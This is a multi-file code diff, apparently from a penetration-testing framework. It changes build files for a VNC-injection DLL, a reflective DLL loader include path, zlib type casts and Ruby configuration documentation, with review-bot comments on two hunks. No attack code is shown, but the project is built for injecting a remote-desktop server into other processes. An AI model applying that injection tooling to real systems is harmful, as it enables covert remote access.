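+<UniqueIdentifier>{22b4b748-5baf-4a41-9ab0-ef1d45f215aa}</UniqueIdentifier>
+</Filter>
+<Filter Include="Source Files\winvnc">
+<UniqueIdentifier>{2a00b2f1-2b80-496f-ade2-3ac76578d435}</UniqueIdentifier>
+</Filter>
+<Filter Include="Header Files">
+<UniqueIdentifier>{c3a89192-29f8-4ebc-b443-1032d86966d6}</UniqueIdentifier>
+<Extensions>.h</Extensions>
+</Filter>
+<Filter Include="Header Files\libjpeg">
+<UniqueIdentifier>{a545ae04-19cc-401a-bb0e-fd3d7aad0f60}</UniqueIdentifier>
+</Filter>
+<Filter Include="Header Files\zlib">
+<UniqueIdentifier>{525d33a4-2360-47f9-9e68-24f7d54d50cb}</UniqueIdentifier>
+</Filter>
+<Filter Include="Header Files\winvnc">
+<UniqueIdentifier>{e0e45b7e-7137-4fa7-acb3-9c57acce4c9c}</UniqueIdentifier>
+</Filter>
+</ItemGroup>
+<ItemGroup>
+<ClCompile Include="vncdll.cpp">
+<Filter>Source Files</Filter>
+</ClCompile>
+<ClCompile Include="vncEncodeCoRRE.cpp">
+<Filter>Source Files\encoder</Filter>
+</ClCompile>
+<ClCompile Include="vncEncodeHexT.cpp">
+<Filter>Source Files\encoder</Filter>
+</ClCompile>
+<ClCompile Include="vncEncoder.cpp">
+<Filter>Source Files\encoder</Filter>
+</ClCompile>
+<ClCompile Include="vncEncodeRRE.cpp">
+<Filter>Source Files\encoder</Filter>
+</ClCompile>
+<ClCompile Include="vncEncodeTight.cpp">
+<Filter>Source Files\encoder</Filter>
+</ClCompile>
+<ClCompile Include="vncEncodeZlib.cpp">
+<Filter>Source Files\encoder</Filter>
+</ClCompile>
+<ClCompile Include="vncEncodeZlibHex.cpp">
+<Filter>Source Files\encoder</Filter>
+</ClCompile>
+<ClCompile Include="omnithread\nt.cpp">
+<Filter>Source Files\omnithread</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jcapimin.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jcapistd.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jccoefct.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jccolor.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jcdctmgr.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jchuff.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jcinit.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jcmainct.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jcmarker.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jcmaster.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jcomapi.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jcparam.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jcphuff.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jcprepct.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jcsample.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jctrans.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jdapimin.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jdapistd.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jdatadst.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jdatasrc.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jdcoefct.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jdcolor.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jddctmgr.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jdhuff.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jdinput.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jdmainct.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jdmarker.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jdmaster.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jdmerge.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jdphuff.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jdpostct.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jdsample.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jdtrans.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jerror.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jfdctflt.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jfdctfst.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jfdctint.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jidctflt.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jidctfst.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jidctint.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jidctred.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jmemmgr.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jmemnobs.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jquant1.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jquant2.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="libjpeg\jutils.c">
+<Filter>Source Files\libjpeg</Filter>
+</ClCompile>
+<ClCompile Include="zlib\adler32.c">
+<Filter>Source Files\zlib</Filter>
+</ClCompile>
+<ClCompile Include="zlib\compress.c">
+<Filter>Source Files\zlib</Filter>
+</ClCompile>
+<ClCompile Include="zlib\crc32.c">
+<Filter>Source Files\zlib</Filter>
+</ClCompile>
+<ClCompile Include="zlib\deflate.c">
+<Filter>Source Files\zlib</Filter>
+</ClCompile>
+<ClCompile Include="zlib\infblock.c">
+<Filter>Source Files\zlib</Filter>
+</ClCompile>
+<ClCompile Include="zlib\infcodes.c">
+<Filter>Source Files\zlib</Filter>
+</ClCompile>
+<ClCompile Include="zlib\inffast.c">
+<Filter>Source Files\zlib</Filter>
+</ClCompile>
+<ClCompile Include="zlib\inflate.c">
+<Filter>Source Files\zlib</Filter>
+</ClCompile>
+<ClCompile Include="zlib\inftrees.c">
+<Filter>Source Files\zlib</Filter>
+</ClCompile>
+<ClCompile Include="zlib\infutil.c">
+<Filter>Source Files\zlib</Filter>
+</ClCompile>
+<ClCompile Include="zlib\maketree.c">
+<Filter>Source Files\zlib</Filter>
+</ClCompile>
+<ClCompile Include="zlib\trees.c">
+<Filter>Source Files\zlib</Filter>
+</ClCompile>
+<ClCompile Include="zlib\uncompr.c">
+<Filter>Source Files\zlib</Filter>
+</ClCompile>
+<ClCompile Include="zlib\zutil.c">
+<Filter>Source Files\zlib</Filter>
+</ClCompile>
+<ClCompile Include="d3des.c">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="DynamicFn.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="FileTransferItemInfo.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="MinMax.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="RectList.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="stdhdrs.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="tableinitcmtemplate.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="tableinittctemplate.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="tabletranstemplate.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="translate.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="TsSessions.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="VideoDriver.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="vncauth.c">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="vncBuffer.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="vncClient.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="vncDesktop.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="vncInstHandler.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="vncKeymap.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="vncRegion.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="vncServer.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="vncService.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="vncSockConnect.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="VSocket.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+<ClCompile Include="WallpaperUtils.cpp">
+<Filter>Source Files\winvnc</Filter>
+</ClCompile>
+</ItemGroup>
+<ItemGroup>
+<ClInclude Include="omnithread\nt.h">
+<Filter>Source Files\omnithread</Filter>
+</ClInclude>
+<ClInclude Include="omnithread\omnithread.h">
+<Filter>Source Files\omnithread</Filter>
+</ClInclude>
+<ClInclude Include="common.h">
+<Filter>Header Files</Filter>
+</ClInclude>
+<ClInclude Include="libjpeg\jchuff.h">
+<Filter>Header Files\libjpeg</Filter>
+</ClInclude>
+<ClInclude Include="libjpeg\jconfig.h">
+<Filter>Header Files\libjpeg</Filter>
+</ClInclude>
+<ClInclude Include="libjpeg\jdct.h">
+<Filter>Header Files\libjpeg</Filter>
+</ClInclude>
+<ClInclude Include="libjpeg\jdhuff.h">
+<Filter>Header Files\libjpeg</Filter>
+</ClInclude>
+<ClInclude Include="libjpeg\jerror.h">
+<Filter>Header Files\libjpeg</Filter>
+</ClInclude>
+<ClInclude Include="libjpeg\jinclude.h">
+<Filter>Header Files\libjpeg</Filter>
+</ClInclude>
+<ClInclude Include="libjpeg\jmemsys.h">
+<Filter>Header Files\libjpeg</Filter>
+</ClInclude>
+<ClInclude Include="libjpeg\jmorecfg.h">
+<Filter>Header Files\libjpeg</Filter>
+</ClInclude>
+<ClInclude Include="libjpeg\jpegint.h">
+<Filter>Header Files\libjpeg</Filter>
+</ClInclude>
+<ClInclude Include="libjpeg\jpeglib.h">
+<Filter>Header Files\libjpeg</Filter>
+</ClInclude>
+<ClInclude Include="libjpeg\jversion.h">
+<Filter>Header Files\libjpeg</Filter>
+</ClInclude>
+<ClInclude Include="zlib\deflate.h">
+<Filter>Header Files\zlib</Filter>
+</ClInclude>
+<ClInclude Include="zlib\infblock.h">
+<Filter>Header Files\zlib</Filter>
+</ClInclude>
+<ClInclude Include="zlib\infcodes.h">
+<Filter>Header Files\zlib</Filter>
+</ClInclude>
+<ClInclude Include="zlib\inffast.h">
+<Filter>Header Files\zlib</Filter>
+</ClInclude>
+<ClInclude Include="zlib\inffixed.h">
+<Filter>Header Files\zlib</Filter>
+</ClInclude>
+<ClInclude Include="zlib\inftrees.h">
+<Filter>Header Files\zlib</Filter>
+</ClInclude>
+<ClInclude Include="zlib\infutil.h">
+<Filter>Header Files\zlib</Filter>
+</ClInclude>
+<ClInclude Include="zlib\trees.h">
+<Filter>Header Files\zlib</Filter>
+</ClInclude>
+<ClInclude Include="zlib\zconf.h">
+<Filter>Header Files\zlib</Filter>
+</ClInclude>
+<ClInclude Include="zlib\zlib.h">
+<Filter>Header Files\zlib</Filter>
+</ClInclude>
+<ClInclude Include="zlib\zutil.h">
+<Filter>Header Files\zlib</Filter>
+</ClInclude>
+<ClInclude Include="AdministrationControls.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="d3des.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="DynamicFn.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="FileTransferItemInfo.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="IncomingConnectionsControls.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="InputHandlingControls.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="keysymdef.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="MatchWindow.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="MinMax.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="PollControls.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="QuerySettingsControls.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="RectList.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="resource.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="rfb.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="rfbproto.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="SharedDesktopArea.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="stdhdrs.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="translate.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="TsSessions.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="VideoDriver.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncAbout.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncauth.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncBuffer.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncClient.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncDesktop.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncEncodeCoRRE.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncEncodeHexT.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncEncoder.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncEncodeRRE.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncEncodeTight.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncEncodeZlib.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncEncodeZlibHex.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncInstHandler.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncKeymap.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncPasswd.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncRegion.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncServer.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncService.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="vncSockConnect.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="VSocket.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="VTypes.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+<ClInclude Include="WallpaperUtils.h">
+<Filter>Header Files\winvnc</Filter>
+</ClInclude>
+</ItemGroup>
+<ItemGroup>
+<Text Include="README.TXT">
+<Filter>Header Files\winvnc</Filter>
+</Text>
+</ItemGroup>
+</Project>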
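--- a/PATH-NOT-SHOWN-ON-PAGE
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -2906,7 +2906,7 @@ bool bDbgBmDump(
 TCHAR szFileName[MAX_PATH];
 sprintf(
 szFileName,
-"%04u.%02u.%02u-%02u-%02u-%02u-0x%08x.bmp",
+"%04u.%02u.%02u-%02u-%02u-%02u-0x%08p.bmp",
 stm.wYear, stm.wMonth, stm.wDay,
 stm.wHour, stm.wMinute, stm.wSecond,
 ptr);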
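Review bot: The new `%08p` conversion pairs the `0` flag with `%p`, which the C standard leaves undefined (the zero-padding flag is specified only for the numeric conversions), and the MSVC CRT already prints `%p` zero-padded to the full pointer width, so `0x%p` produces the same file name portably. The `sprintf` into `szFileName[MAX_PATH]` stays in bounds only because every field in this format has a fixed width; `_sntprintf_s(szFileName, MAX_PATH, _TRUNCATE, ...)` would make that bound explicit and would also follow `TCHAR` if this is ever built with UNICODE, where `sprintf` writes narrow characters into a wide buffer. The body of `bDbgBmDump` begins before and continues after the hunk.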
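--- a/PATH-NOT-SHOWN-ON-PAGE
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -15,7 +15,7 @@
 */
 #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
 #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
-#include "ReflectiveLoader.c"
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
 
 HANDLE hMessageMutex = NULL;
 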
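Review bot: The new include path climbs three directories into a separate ReflectiveDLLInjection tree, so this file now depends on a checkout layout that nothing at the point of use explains; a comment above the include such as `/* ReflectiveLoader.c is compiled into this DLL from the shared ReflectiveDLLInjection sources; the relative path assumes that tree is checked out beside this one. */` would spare the next reader the search. If the project already puts that directory on its include path, keeping the short `#include "ReflectiveLoader.c"` and adding the directory to the project's include settings would hold the layout in one place rather than in every consumer. The two `REFLECTIVEDLLINJECTION_*` defines just above presumably configure the included source, which the same comment could state.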
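--- a/PATH-NOT-SHOWN-ON-PAGE
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -99,7 +99,7 @@ z_streamp z;
 do {
 r += s->end - s->window; /* force pointer in window */
 } while (r < s->window); /* covers invalid distances */
-e = s->end - r;
+e = (uInt)(s->end - r);
 if (c > e)
 {
 c -= e; /* wrapped copy */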
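--- a/PATH-NOT-SHOWN-ON-PAGE
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -334,7 +334,7 @@ z_streamp z;
 }
 
 /* restore */
-z->total_in += p - z->next_in;
+z->total_in += (uLong)(p - z->next_in);
 z->next_in = p;
 z->avail_in = n;
 z->state->sub.marker = m;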
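--- a/PATH-NOT-SHOWN-ON-PAGE
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -64,7 +64,7 @@ struct inflate_blocks_state {
 /* defines for inflate input/output */
 /* update pointers and return */
 #define UPDBITS {s->bitb=b;s->bitk=k;}
-#define UPDIN {z->avail_in=n;z->total_in+=p-z->next_in;z->next_in=p;}
+#define UPDIN {z->avail_in=n;z->total_in+=(uLong)(p-z->next_in);z->next_in=p;}
 #define UPDOUT {s->write=q;}
 #define UPDATE {UPDBITS UPDIN UPDOUT}
 #define LEAVE {UPDATE return inflate_flush(s,z,r);}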
@ -3,22 +3,16 @@ require 'fileutils'
|
||||||
|
|
||||||
module Msf
|
module Msf
|
||||||
|
|
||||||
###
|
|
||||||
#
|
|
||||||
# This class wraps interaction with global configuration that can be used as a
|
# This class wraps interaction with global configuration that can be used as a
|
||||||
# persistent storage point for configuration, logs, and other such fun things.
|
# persistent storage point for configuration, logs, and other such fun things.
|
||||||
#
|
|
||||||
###
|
|
||||||
class Config < Hash
|
class Config < Hash
|
||||||
|
|
||||||
#
|
# The installation's root directory for the distribution
|
||||||
# The installation root directory for the distribution
|
|
||||||
#
|
|
||||||
InstallRoot = File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..'))
|
InstallRoot = File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..'))
|
||||||
|
|
||||||
#
|
|
||||||
# Determines the base configuration directory.
|
# Determines the base configuration directory.
|
||||||
#
|
#
|
||||||
|
# @return [String] the base configuration directory
|
||||||
def self.get_config_root
|
def self.get_config_root
|
||||||
|
|
||||||
# Use MSFCFGDIR environment variable first. See feature request #5797
|
# Use MSFCFGDIR environment variable first. See feature request #5797
|
||||||
|
@ -47,7 +41,11 @@ class Config < Hash
|
||||||
#
|
#
|
||||||
# Default values
|
# Default values
|
||||||
#
|
#
|
||||||
|
|
||||||
|
# Default system file separator.
|
||||||
FileSep = File::SEPARATOR
|
FileSep = File::SEPARATOR
|
||||||
|
|
||||||
|
# Default configuration locations.
|
||||||
Defaults =
|
Defaults =
|
||||||
{
|
{
|
||||||
'ConfigDirectory' => get_config_root,
|
'ConfigDirectory' => get_config_root,
|
||||||
|
@ -68,247 +66,260 @@ class Config < Hash
|
||||||
#
|
#
|
||||||
##
|
##
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the framework installation root.
|
# Returns the framework installation root.
|
||||||
#
|
#
|
||||||
|
# @return [String] the framework installation root {InstallRoot}.
|
||||||
def self.install_root
|
def self.install_root
|
||||||
InstallRoot
|
InstallRoot
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the configuration directory default.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] the root configuration directory.
|
||||||
#
|
|
||||||
def self.config_directory
|
def self.config_directory
|
||||||
self.new.config_directory
|
self.new.config_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the global module directory.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to global module directory.
|
||||||
#
|
|
||||||
def self.module_directory
|
def self.module_directory
|
||||||
self.new.module_directory
|
self.new.module_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the path that scripts can be loaded from.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to script directory.
|
||||||
#
|
|
||||||
def self.script_directory
|
def self.script_directory
|
||||||
self.new.script_directory
|
self.new.script_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the directory that log files should be stored in.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to log directory.
|
||||||
#
|
|
||||||
def self.log_directory
|
def self.log_directory
|
||||||
self.new.log_directory
|
self.new.log_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the directory that plugins are stored in.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to plugin directory.
|
||||||
#
|
|
||||||
def self.plugin_directory
|
def self.plugin_directory
|
||||||
self.new.plugin_directory
|
self.new.plugin_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the user-specific plugin base path
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to user-specific plugin directory.
|
||||||
#
|
|
||||||
def self.user_plugin_directory
|
def self.user_plugin_directory
|
||||||
self.new.user_plugin_directory
|
self.new.user_plugin_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the directory in which session log files are to reside.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to session log directory.
|
||||||
#
|
|
||||||
def self.session_log_directory
|
def self.session_log_directory
|
||||||
self.new.session_log_directory
|
self.new.session_log_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the directory in which captured data will reside.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to loot directory.
|
||||||
#
|
|
||||||
def self.loot_directory
|
def self.loot_directory
|
||||||
self.new.loot_directory
|
self.new.loot_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the directory in which locally-generated data will reside.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to locally-generated data directory.
|
||||||
#
|
|
||||||
def self.local_directory
|
def self.local_directory
|
||||||
self.new.local_directory
|
self.new.local_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the user-specific module base path
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to user-specific modules directory.
|
||||||
#
|
|
||||||
def self.user_module_directory
|
def self.user_module_directory
|
||||||
self.new.user_module_directory
|
self.new.user_module_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the user-specific script base path
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to user-specific script directory.
|
||||||
#
|
|
||||||
def self.user_script_directory
|
def self.user_script_directory
|
||||||
self.new.user_script_directory
|
self.new.user_script_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the data directory
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to data directory.
|
||||||
#
|
|
||||||
def self.data_directory
|
def self.data_directory
|
||||||
self.new.data_directory
|
self.new.data_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the full path to the configuration file.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to the configuration file.
|
||||||
#
|
|
||||||
def self.config_file
|
def self.config_file
|
||||||
self.new.config_file
|
self.new.config_file
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the full path to the history file.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path the history file.
|
||||||
#
|
|
||||||
def self.history_file
|
def self.history_file
|
||||||
self.new.history_file
|
self.new.history_file
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Initializes configuration, creating directories as necessary.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [void]
|
||||||
#
|
|
||||||
def self.init
|
def self.init
|
||||||
self.new.init
|
self.new.init
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Loads configuration from the supplied file path, or the default one if
|
||||||
|
# none is specified.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @param path [String] the path to the configuration file.
|
||||||
#
|
# @return [Rex::Parser::Ini] INI file parser.
|
||||||
def self.load(path = nil)
|
def self.load(path = nil)
|
||||||
self.new.load(path)
|
self.new.load(path)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Saves configuration to the path specified in the ConfigFile hash key or
|
||||||
|
# the default path if one isn't specified. The options should be group
|
||||||
|
# references that have named value pairs.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @param opts [Hash] Hash containing configuration options.
|
||||||
#
|
# @option opts 'ConfigFile' [Hash] configuration file these options apply
|
||||||
|
# to.
|
||||||
|
# @return [void]
|
||||||
|
# @example Save 'Cat' => 'Foo' in group 'ExampleGroup'
|
||||||
|
# save(
|
||||||
|
# 'ExampleGroup' =>
|
||||||
|
# {
|
||||||
|
# 'Foo' => 'Cat'
|
||||||
|
# })
|
||||||
def self.save(opts)
|
def self.save(opts)
|
||||||
self.new.save(opts)
|
self.new.save(opts)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Updates the config class' self with the default hash.
|
# Updates the config class' self with the default hash.
|
||||||
#
|
#
|
||||||
|
# @return [Hash] the updated Hash.
|
||||||
def initialize
|
def initialize
|
||||||
update(Defaults)
|
update(Defaults)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the installation root directory
|
# Returns the installation root directory
|
||||||
#
|
#
|
||||||
|
# @return [String] the installation root directory {InstallRoot}.
|
||||||
def install_root
|
def install_root
|
||||||
InstallRoot
|
InstallRoot
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the configuration directory default.
|
# Returns the configuration directory default.
|
||||||
#
|
#
|
||||||
|
# @return [String] the root configuration directory.
|
||||||
def config_directory
|
def config_directory
|
||||||
self['ConfigDirectory']
|
self['ConfigDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the full path to the configuration file.
|
# Returns the full path to the configuration file.
|
||||||
#
|
#
|
||||||
|
# @return [String] path to the configuration file.
|
||||||
def config_file
|
def config_file
|
||||||
